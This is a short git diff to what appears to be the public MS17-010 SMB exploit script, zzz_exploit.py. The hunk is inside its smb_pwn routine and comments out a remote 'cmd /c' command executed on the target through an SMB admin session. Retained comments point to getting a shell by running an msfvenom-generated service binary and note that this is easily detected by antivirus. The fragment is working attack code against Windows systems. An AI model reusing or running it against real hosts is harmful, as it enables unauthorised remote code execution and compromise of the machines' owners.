diff --git a/zzz_exploit.py b/zzz_exploit.py index 5c6c2c7..f363c9b 100644 --- a/zzz_exploit.py +++ b/zzz_exploit.py @@ -967,7 +967,7 @@ def smb_pwn(conn, arch): smbConn.disconnectTree(tid2) #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py') - service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt') + #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt') # Note: there are many methods to get shell over SMB admin session # a simple method to get shell (but easily to be detected by AV) is # executing binary generated by "msfvenom -f exe-service ..."